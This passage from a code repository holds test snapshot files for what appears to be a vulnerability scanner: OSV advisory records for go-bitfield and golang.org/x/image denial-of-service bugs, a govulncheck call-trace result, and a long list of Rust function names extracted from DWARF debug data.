`NewBitfield` or `FromBytes`\n\n### References\n- https://github.com/ipfs/go-unixfs/security/advisories/GHSA-q264-w97q-q778\n", "id": "GHSA-2h6c-j3gf-xp9r", "modified": "2023-02-10T19:52:45Z", "published": "2023-02-10T19:52:45Z", "references": [ { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23626" }, { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" }, { "type": "PACKAGE", "url": "https://github.com/ipfs/go-bitfield" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1558" } ], "schema_version": "1.3.0", "summary": "IPFS go-bitfield vulnerable to DoS via malformed size arguments" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1558.json", "url": "https://pkg.go.dev/vuln/GO-2023-1558" }, "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.1.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2023-23626", "GHSA-2h6c-j3gf-xp9r" ], "details": "When feeding untrusted user input into the size parameter of `NewBitfield` and FromBytes functions, an attacker can trigger panics.\n\nThis happens when the size is a not a multiple of 8 or is negative.\n\nA workaround is to ensure size%8 == 0 \u0026\u0026 size \u003e= 0 yourself before calling NewBitfield or FromBytes.", "id": "GO-2023-1558", "modified": "2023-02-14T19:41:21Z", "published": "2023-02-14T19:41:21Z", "references": [ { "type": "ADVISORY", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "FIX", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" } ], "schema_version": "1.3.0" } ] }, { "package": { "name": "golang.org/x/image", "version": "0.4.0", "ecosystem": "Go" 
}, "groups": [ { "ids": [ "GHSA-qgc7-mgm3-q253", "GO-2023-1572" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-qgc7-mgm3-q253/GHSA-qgc7-mgm3-q253.json" }, "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-41727" ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T13:59:44Z", "nvd_published_at": null, "severity": "LOW" }, "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. This could lead to a denial of service.", "id": "GHSA-qgc7-mgm3-q253", "modified": "2023-02-17T13:59:44Z", "published": "2023-02-17T13:59:44Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41727" }, { "type": "WEB", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://go.dev/issue/58003" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1572" } ], "schema_version": "1.3.0", "summary": "Uncontrolled Resource Consumption" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1572.json", "url": "https://pkg.go.dev/vuln/GO-2023-1572" }, "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-41727" ], "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. 
This could lead to a denial of service.", "id": "GO-2023-1572", "modified": "2023-02-16T22:25:24Z", "published": "2023-02-16T22:25:24Z", "references": [ { "type": "REPORT", "url": "https://go.dev/issue/58003" }, { "type": "FIX", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" } ], "schema_version": "1.3.0" } ] } ] --- ================================================ FILE: internal/sourceanalysis/__snapshots__/integration_test.snap ================================================ [Test_runGovulncheck - 1] { "GO-2021-0053": [ { "osv": "GO-2021-0053", "fixed_version": "v1.3.2", "trace": [ { "module": "github.com/gogo/protobuf", "version": "v1.3.1" } ] }, { "osv": "GO-2021-0053", "fixed_version": "v1.3.2", "trace": [ { "module": "github.com/gogo/protobuf", "version": "v1.3.1", "package": "github.com/gogo/protobuf/plugin/unmarshal" } ] } ], "GO-2023-1558": [ { "osv": "GO-2023-1558", "fixed_version": "v1.1.0", "trace": [ { "module": "github.com/ipfs/go-bitfield", "version": "v1.0.0" } ] }, { "osv": "GO-2023-1558", "fixed_version": "v1.1.0", "trace": [ { "module": "github.com/ipfs/go-bitfield", "version": "v1.0.0", "package": "github.com/ipfs/go-bitfield" } ] }, { "osv": "GO-2023-1558", "fixed_version": "v1.1.0", "trace": [ { "module": "github.com/ipfs/go-bitfield", "version": "v1.0.0", "package": "github.com/ipfs/go-bitfield", "function": "NewBitfield", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 12, "column": 6 } }, { "module": "github.com/ossf-tests/osv-e2e", "package": "github.com/ossf-tests/osv-e2e", "function": "main", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 16, "column": 22 } } ] } ], "GO-2023-2382": [ { "osv": "GO-2023-2382", "fixed_version": "v1.20.12", "trace": [ { "module": "stdlib", "version": "v1.19.0" } ] }, { "osv": "GO-2023-2382", "fixed_version": "v1.20.12", "trace": [ { "module": "stdlib", "version": "v1.19.0", "package": 
"net/http/internal" } ] }, { "osv": "GO-2023-2382", "fixed_version": "v1.20.12", "trace": [ { "module": "stdlib", "version": "v1.19.0", "package": "net/http/internal", "function": "Read", "receiver": "*chunkedReader", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": -1, "column": 26 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "readLocked", "receiver": "*body", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": -1, "column": 21 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "Read", "receiver": "bodyLocked", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": -1, "column": 24 } }, { "module": "stdlib", "version": "v1.19.0", "package": "io", "function": "copyBuffer", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": -1, "column": 21 } }, { "module": "stdlib", "version": "v1.19.0", "package": "io", "function": "Copy", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": -1, "column": 19 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "Close", "receiver": "*body", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": -1, "column": 19 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "finishRequest", "receiver": "*response", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": -1, "column": 17 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "serve", "receiver": "*conn", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": -1, "column": 18 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "Serve", "receiver": "*Server", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": -1, "column": 3 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": 
"ListenAndServe", "receiver": "*Server", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": -1, "column": -1 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "ListenAndServe", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": -1, "column": 30 } }, { "module": "github.com/ossf-tests/osv-e2e", "package": "github.com/ossf-tests/osv-e2e", "function": "main", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": -1, "column": 28 } } ] } ] } --- ================================================ FILE: internal/sourceanalysis/__snapshots__/rust_test.snap ================================================ [Test_functionsFromDWARF/Parsing_DWARF_medium.o - 1] { "\u0026T::fmt": {}, "alloc::alloc::Global::deallocate": {}, "alloc::alloc::Global::grow": {}, "alloc::alloc::Global::grow_impl": {}, "alloc::alloc::box_free": {}, "alloc::alloc::dealloc": {}, "alloc::alloc::realloc": {}, "alloc::raw_vec::RawVec::current_memory": {}, "alloc::raw_vec::RawVec::drop": {}, "alloc::raw_vec::RawVec::grow_amortized": {}, "alloc::raw_vec::RawVec::ptr": {}, "alloc::raw_vec::RawVec::reserve_for_push": {}, "alloc::raw_vec::RawVec::set_ptr_and_cap": {}, "alloc::raw_vec::finish_grow": {}, "alloc::raw_vec::handle_reserve": {}, "alloc::rc::is_dangling": {}, "alloc::sync::Arc::drop": {}, "alloc::sync::Arc::drop_slow": {}, "alloc::sync::Arc::get_mut_unchecked": {}, "alloc::sync::Arc::inner": {}, "alloc::sync::Weak::drop": {}, "alloc::sync::Weak::inner": {}, "alloc::vec::Vec::as_mut_ptr": {}, "alloc::vec::Vec::drop": {}, "alloc::vec::Vec::new": {}, "alloc::vec::Vec::push": {}, "arrayvec::ArrayVec::clear": {}, "arrayvec::ArrayVec::drop": {}, "arrayvec::ArrayVec::len": {}, "arrayvec::ArrayVec::pop": {}, "arrayvec::ArrayVec::set_len": {}, "core::alloc::layout::Layout::array": {}, "core::alloc::layout::Layout::array::inner": {}, "core::alloc::layout::Layout::for_value_raw": {}, "core::cmp::Ord::max": {}, 
"core::cmp::max": {}, "core::core_arch::x86::sse2::mm_load_si128": {}, "core::core_arch::x86::sse2::mm_movemask_epi8": {}, "core::fmt::Arguments::new_v1": {}, "core::fmt::Arguments::new_v1_formatted": {}, "core::fmt::num::\u003cimpl core::fmt::Debug for i32\u003e::fmt": {}, "core::fmt::num::\u003cimpl core::fmt::Debug for usize\u003e::fmt": {}, "core::mem::drop": {}, "core::mem::maybe_uninit::MaybeUninit::assume_init": {}, "core::mem::size_of_val_raw": {}, "core::num::\u003cimpl isize\u003e::wrapping_neg": {}, "core::num::\u003cimpl isize\u003e::wrapping_sub": {}, "core::num::\u003cimpl usize\u003e::checked_add": {}, "core::num::\u003cimpl usize\u003e::checked_mul": {}, "core::num::\u003cimpl usize\u003e::overflowing_add": {}, "core::num::\u003cimpl usize\u003e::overflowing_mul": {}, "core::panicking::assert_failed": {}, "core::ptr::const_ptr::\u003cimpl *const T\u003e::add": {}, "core::ptr::const_ptr::\u003cimpl *const T\u003e::as_ref": {}, "core::ptr::const_ptr::\u003cimpl *const T\u003e::guaranteed_eq": {}, "core::ptr::const_ptr::\u003cimpl *const T\u003e::is_null": {}, "core::ptr::const_ptr::\u003cimpl *const T\u003e::offset": {}, "core::ptr::drop_in_place\u003c\u0026usize\u003e": {}, "core::ptr::drop_in_place\u003c(alloc::string::String,usize)\u003e": {}, "core::ptr::drop_in_place\u003c(regex::dfa::State,u32)\u003e": {}, "core::ptr::drop_in_place\u003c[alloc::boxed::Box\u003ccore::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e\u003e]\u003e": {}, "core::ptr::drop_in_place\u003c[alloc::string::String]\u003e": {}, "core::ptr::drop_in_place\u003c[alloc::vec::Vec\u003c(usize,u16)\u003e]\u003e": {}, "core::ptr::drop_in_place\u003c[alloc::vec::Vec]\u003e": {}, "core::ptr::drop_in_place\u003c[core::option::Option\u003calloc::string::String\u003e]\u003e": {}, "core::ptr::drop_in_place\u003c[regex::dfa::State]\u003e": {}, "core::ptr::drop_in_place\u003c[regex::prog::Inst]\u003e": {}, 
"core::ptr::drop_in_place\u003c[regex_syntax::hir::literal::Literal]\u003e": {}, "core::ptr::drop_in_place\u003caho_corasick::ahocorasick::AhoCorasick\u003e": {}, "core::ptr::drop_in_place\u003caho_corasick::packed::api::SearchKind\u003e": {}, "core::ptr::drop_in_place\u003caho_corasick::packed::api::Searcher\u003e": {}, "core::ptr::drop_in_place\u003caho_corasick::packed::pattern::Patterns\u003e": {}, "core::ptr::drop_in_place\u003caho_corasick::packed::rabinkarp::RabinKarp\u003e": {}, "core::ptr::drop_in_place\u003caho_corasick::packed::teddy::runtime::Teddy\u003e": {}, "core::ptr::drop_in_place\u003calloc::boxed::Box\u003c[(char,char)]\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::boxed::Box\u003c[u8]\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::boxed::Box\u003c[usize]\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::boxed::Box\u003ccore::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::boxed::Box\u003ccrossbeam_epoch::sync::queue::Node\u003ccrossbeam_epoch::internal::SealedBag\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::boxed::Box\u003cdyn core::ops::function::Fn\u003c()\u003e+Output = core::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e+core::panic::unwind_safe::UnwindSafe+core::marker::Send+core::marker::Sync+core::panic::unwind_safe::RefUnwindSafe\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::boxed::Box\u003cregex::pool::Pool\u003ccore::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003c(usize,u16)\u003e\u003e": {}, 
"core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003calloc::boxed::Box\u003ccore::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003calloc::string::String\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003calloc::vec::Vec\u003c(usize,u16)\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003calloc::vec::Vec\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003ccore::option::Option\u003calloc::string::String\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003ccore::option::Option\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003cregex::backtrack::Job\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003cregex::dfa::State\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003cregex::pikevm::FollowEpsilon\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003cregex::prog::Inst\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003cregex_syntax::hir::literal::Literal\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003e": {}, "core::ptr::drop_in_place\u003calloc::string::String\u003e": {}, "core::ptr::drop_in_place\u003calloc::sync::Arc\u003c[u8]\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::sync::Arc\u003ccrossbeam_epoch::internal::Global\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::sync::Arc\u003cdyn aho_corasick::ahocorasick::AcAutomaton\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::sync::Arc\u003cregex::exec::ExecReadOnly\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::sync::Arc\u003cstd::collections::hash::map::HashMap\u003calloc::string::String,usize\u003e\u003e\u003e": {}, 
"core::ptr::drop_in_place\u003calloc::sync::Weak\u003c[u8]\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::sync::Weak\u003ccrossbeam_epoch::internal::Global\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::sync::Weak\u003cdyn aho_corasick::ahocorasick::AcAutomaton\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::sync::Weak\u003cregex::exec::ExecReadOnly\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::sync::Weak\u003cstd::collections::hash::map::HashMap\u003calloc::string::String,usize\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003c(usize,u16)\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003calloc::boxed::Box\u003ccore::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003calloc::string::String\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003calloc::vec::Vec\u003c(usize,u16)\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003calloc::vec::Vec\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003ccore::option::Option\u003calloc::string::String\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003ccore::option::Option\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003cregex::backtrack::Job\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003cregex::dfa::State\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003cregex::pikevm::FollowEpsilon\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003cregex::prog::Inst\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003cregex_syntax::hir::literal::Literal\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003e": {}, "core::ptr::drop_in_place\u003carrayvec::ArrayVec\u003c[crossbeam_epoch::deferred::Deferred; 64]\u003e\u003e": {}, 
"core::ptr::drop_in_place\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccore::cell::UnsafeCell\u003calloc::vec::Vec\u003calloc::boxed::Box\u003ccore::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e\u003e\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccore::cell::UnsafeCell\u003cregex::exec::ProgramCacheInner\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccore::option::Option\u003caho_corasick::ahocorasick::AhoCorasick\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccore::option::Option\u003calloc::string::String\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccore::option::Option\u003ccrossbeam_epoch::internal::SealedBag\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccore::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccore::result::Result\u003cregex::re_unicode::Regex,regex::error::Error\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccrossbeam_epoch::atomic::Owned\u003ccrossbeam_epoch::sync::queue::Node\u003ccrossbeam_epoch::internal::SealedBag\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccrossbeam_epoch::collector::Collector\u003e": {}, "core::ptr::drop_in_place\u003ccrossbeam_epoch::internal::Bag\u003e": {}, "core::ptr::drop_in_place\u003ccrossbeam_epoch::internal::Global\u003e": {}, "core::ptr::drop_in_place\u003ccrossbeam_epoch::internal::SealedBag\u003e": {}, "core::ptr::drop_in_place\u003ccrossbeam_epoch::sync::list::List\u003ccrossbeam_epoch::internal::Local\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccrossbeam_epoch::sync::queue::Queue\u003ccrossbeam_epoch::internal::SealedBag\u003e\u003e": {}, "core::ptr::drop_in_place\u003cdyn aho_corasick::ahocorasick::AcAutomaton\u003e": {}, 
"core::ptr::drop_in_place\u003chashbrown::map::HashMap\u003calloc::string::String,usize,std::collections::hash::map::RandomState\u003e\u003e": {}, "core::ptr::drop_in_place\u003chashbrown::map::HashMap\u003cregex::dfa::State,u32,std::collections::hash::map::RandomState\u003e\u003e": {}, "core::ptr::drop_in_place\u003chashbrown::raw::RawTable\u003c(alloc::string::String,usize)\u003e\u003e": {}, "core::ptr::drop_in_place\u003chashbrown::raw::RawTable\u003c(regex::dfa::State,u32)\u003e\u003e": {}, "core::ptr::drop_in_place\u003cmemchr::cow::CowBytes\u003e": {}, "core::ptr::drop_in_place\u003cmemchr::cow::Imp\u003e": {}, "core::ptr::drop_in_place\u003cmemchr::memmem::Finder\u003e": {}, "core::ptr::drop_in_place\u003cmemchr::memmem::Searcher\u003e": {}, "core::ptr::drop_in_place\u003cregex::backtrack::Cache\u003e": {}, "core::ptr::drop_in_place\u003cregex::dfa::Cache\u003e": {}, "core::ptr::drop_in_place\u003cregex::dfa::CacheInner\u003e": {}, "core::ptr::drop_in_place\u003cregex::dfa::State\u003e": {}, "core::ptr::drop_in_place\u003cregex::dfa::StateMap\u003e": {}, "core::ptr::drop_in_place\u003cregex::dfa::Transitions\u003e": {}, "core::ptr::drop_in_place\u003cregex::error::Error\u003e": {}, "core::ptr::drop_in_place\u003cregex::exec::Exec\u003e": {}, "core::ptr::drop_in_place\u003cregex::exec::ExecReadOnly\u003e": {}, "core::ptr::drop_in_place\u003cregex::exec::ProgramCacheInner\u003e": {}, "core::ptr::drop_in_place\u003cregex::literal::imp::LiteralSearcher\u003e": {}, "core::ptr::drop_in_place\u003cregex::literal::imp::Matcher\u003e": {}, "core::ptr::drop_in_place\u003cregex::literal::imp::Memmem\u003e": {}, "core::ptr::drop_in_place\u003cregex::literal::imp::SingleByteSet\u003e": {}, "core::ptr::drop_in_place\u003cregex::pikevm::Cache\u003e": {}, "core::ptr::drop_in_place\u003cregex::pikevm::Threads\u003e": {}, 
"core::ptr::drop_in_place\u003cregex::pool::Pool\u003ccore::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003cregex::prog::Inst\u003e": {}, "core::ptr::drop_in_place\u003cregex::prog::InstRanges\u003e": {}, "core::ptr::drop_in_place\u003cregex::prog::Program\u003e": {}, "core::ptr::drop_in_place\u003cregex::re_unicode::Regex\u003e": {}, "core::ptr::drop_in_place\u003cregex::sparse::SparseSet\u003e": {}, "core::ptr::drop_in_place\u003cregex_syntax::hir::literal::Literal\u003e": {}, "core::ptr::drop_in_place\u003cstd::collections::hash::map::HashMap\u003calloc::string::String,usize\u003e\u003e": {}, "core::ptr::drop_in_place\u003cstd::collections::hash::map::HashMap\u003cregex::dfa::State,u32\u003e\u003e": {}, "core::ptr::drop_in_place\u003cstd::sync::mutex::Mutex\u003calloc::vec::Vec\u003calloc::boxed::Box\u003ccore::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e\u003e\u003e\u003e\u003e": {}, "core::ptr::mut_ptr::\u003cimpl *mut T\u003e::drop_in_place": {}, "core::ptr::mut_ptr::\u003cimpl *mut T\u003e::offset": {}, "core::ptr::mut_ptr::\u003cimpl *mut T\u003e::sub": {}, "core::ptr::non_null::NonNull::as_ref": {}, "core::ptr::read": {}, "core::ptr::write": {}, "core::result::Result::branch": {}, "core::result::Result::fmt": {}, "core::result::Result::from_residual": {}, "core::result::Result::map": {}, "core::result::Result::map_err": {}, "core::result::Result::unwrap": {}, "core::sync::atomic::AtomicUsize::compare_exchange": {}, "core::sync::atomic::AtomicUsize::fetch_sub": {}, "core::sync::atomic::AtomicUsize::load": {}, "core::sync::atomic::atomic_compare_exchange": {}, "core::sync::atomic::atomic_load": {}, "core::sync::atomic::atomic_sub": {}, "crossbeam_epoch::atomic::Atomic::compare_and_set": {}, "crossbeam_epoch::atomic::Atomic::load": {}, "crossbeam_epoch::atomic::Owned::drop": {}, 
"crossbeam_epoch::atomic::Shared::as_raw": {}, "crossbeam_epoch::atomic::Shared::deref": {}, "crossbeam_epoch::atomic::Shared::tag": {}, "crossbeam_epoch::atomic::decompose_data": {}, "crossbeam_epoch::deferred::Deferred::new": {}, "crossbeam_epoch::deferred::Deferred::new::call": {}, "crossbeam_epoch::guard::Guard::defer_destroy": {}, "crossbeam_epoch::guard::Guard::defer_unchecked": {}, "crossbeam_epoch::guard::Guard::defer_unchecked::{{closure}}": {}, "crossbeam_epoch::sync::list::List::drop": {}, "crossbeam_epoch::sync::queue::Queue::drop": {}, "crossbeam_epoch::sync::queue::Queue::pop_internal": {}, "crossbeam_epoch::sync::queue::Queue::pop_internal::{{closure}}": {}, "crossbeam_epoch::sync::queue::Queue::try_pop": {}, "hashbrown::raw::Bucket::drop": {}, "hashbrown::raw::Bucket::next_n": {}, "hashbrown::raw::RawIter::next": {}, "hashbrown::raw::RawIterRange::new": {}, "hashbrown::raw::RawIterRange::next_impl": {}, "hashbrown::raw::RawTable::data_end": {}, "hashbrown::raw::RawTable::drop": {}, "hashbrown::raw::RawTable::drop_elements": {}, "hashbrown::raw::RawTable::free_buckets": {}, "hashbrown::raw::RawTable::is_empty": {}, "hashbrown::raw::RawTable::iter": {}, "hashbrown::raw::RawTable::len": {}, "hashbrown::raw::RawTableInner::buckets": {}, "hashbrown::raw::RawTableInner::free_buckets": {}, "hashbrown::raw::RawTableInner::is_empty_singleton": {}, "hashbrown::raw::TableLayout::calculate_layout_for": {}, "hashbrown::raw::bitmask::BitMask::invert": {}, "hashbrown::raw::bitmask::BitMask::lowest_set_bit": {}, "hashbrown::raw::bitmask::BitMask::remove_lowest_bit": {}, "hashbrown::raw::sse2::Group::load_aligned": {}, "hashbrown::raw::sse2::Group::match_empty_or_deleted": {}, "hashbrown::raw::sse2::Group::match_full": {}, "test_rust_2::another_func": {}, "test_rust_2::exported_func": {} } --- [Test_functionsFromDWARF/Parsing_DWARF_simple.o - 1] { "core::fmt::Arguments::new_v1": {}, "test_rust_2::a_cool_func_name": {} } --- 
[Test_functionsFromDWARF/Parsing_DWARF_test-rust-2 - 1] { "\u0026T::as_ref": {}, "\u0026T::fmt": {}, "\u0026[u8]::spec_new_impl": {}, "\u0026mut I::len": {}, "\u0026mut T::fmt": {}, "\u0026mut W::write_char": {}, "\u0026mut W::write_fmt": {}, "\u0026mut W::write_str": {}, "\u0026std::io::stdio::Stderr::write_fmt": {}, "\u0026std::io::stdio::Stdout::write_fmt": {}, "\u0026str::into_searcher": {}, "\u0026str::is_prefix_of": {}, "\u0026str::is_suffix_of": {}, "\u0026u32::shl": {}, "\u0026u8::bitand": {}, "\u0026u8::shr": {}, "()::fmt": {}, "*const T::fmt": {}, "*mut T::fmt": {}, "\u003cT as alloc::slice::hack::ConvertVec\u003e::to_vec::DropGuard::drop": {}, "\u003calloc::boxed::Box\u003cdyn core::error::Error+core::marker::Send+core::marker::Sync\u003e as core::convert::From\u003calloc::string::String\u003e\u003e::from::StringError::description": {}, "\u003calloc::boxed::Box\u003cdyn core::error::Error+core::marker::Send+core::marker::Sync\u003e as core::convert::From\u003calloc::string::String\u003e\u003e::from::StringError::fmt": {}, "\u003calloc::vec::drain::Drain as core::ops::drop::Drop\u003e::drop::DropGuard::drop": {}, "\u003calloc::vec::into_iter::IntoIter as core::ops::drop::Drop\u003e::drop::DropGuard::drop": {}, "\u003cdyn core::any::Any+core::marker::Send\u003e::downcast_ref": {}, "\u003cdyn core::any::Any\u003e::downcast_ref": {}, "\u003cdyn core::any::Any\u003e::is": {}, "F::into_searcher": {}, "I::into_iter": {}, "T::clone": {}, "T::from_elem": {}, "T::into": {}, "T::spec_eq": {}, "T::spec_ne": {}, "T::spec_new_impl": {}, "T::to_vec": {}, "T::type_id": {}, "[A]::equal": {}, "[T]::fmt": {}, "addr2line::Context::find_frames": {}, "addr2line::Context::find_units": {}, "addr2line::Context::find_units_range": {}, "addr2line::Context::find_units_range::{{closure}}": {}, "addr2line::Context::from_dwarf": {}, "addr2line::FrameIter::next": {}, "addr2line::FrameIter::next::{{closure}}": {}, "addr2line::LocationRangeUnitIter::new": {}, 
"addr2line::LocationRangeUnitIter::new::{{closure}}": {}, "addr2line::RangeAttributes::for_each_range": {}, "addr2line::RangeAttributes::for_each_range::{{closure}}": {}, "addr2line::ResDwarf::find_unit": {}, "addr2line::ResDwarf::parse": {}, "addr2line::ResDwarf::parse::{{closure}}": {}, "addr2line::ResUnit::find_function_or_location": {}, "addr2line::ResUnit::find_function_or_location::{{closure}}": {}, "addr2line::ResUnit::find_location": {}, "addr2line::ResUnit::parse_functions": {}, "addr2line::ResUnit::parse_functions::{{closure}}": {}, "addr2line::ResUnit::parse_lines": {}, "addr2line::ResUnit::parse_lines::{{closure}}": {}, "addr2line::ResUnit::render_file": {}, "addr2line::function::Function::find_inlined_functions": {}, "addr2line::function::Function::find_inlined_functions::{{closure}}": {}, "addr2line::function::Function::parse": {}, "addr2line::function::Function::parse::{{closure}}": {}, "addr2line::function::Function::parse_children": {}, "addr2line::function::Function::skip": {}, "addr2line::function::Functions::find_address": {}, "addr2line::function::Functions::find_address::{{closure}}": {}, "addr2line::function::Functions::parse": {}, "addr2line::function::Functions::parse::{{closure}}": {}, "addr2line::function::InlinedFunction::parse": {}, "addr2line::function::InlinedFunction::parse::{{closure}}": {}, "addr2line::function::name_attr": {}, 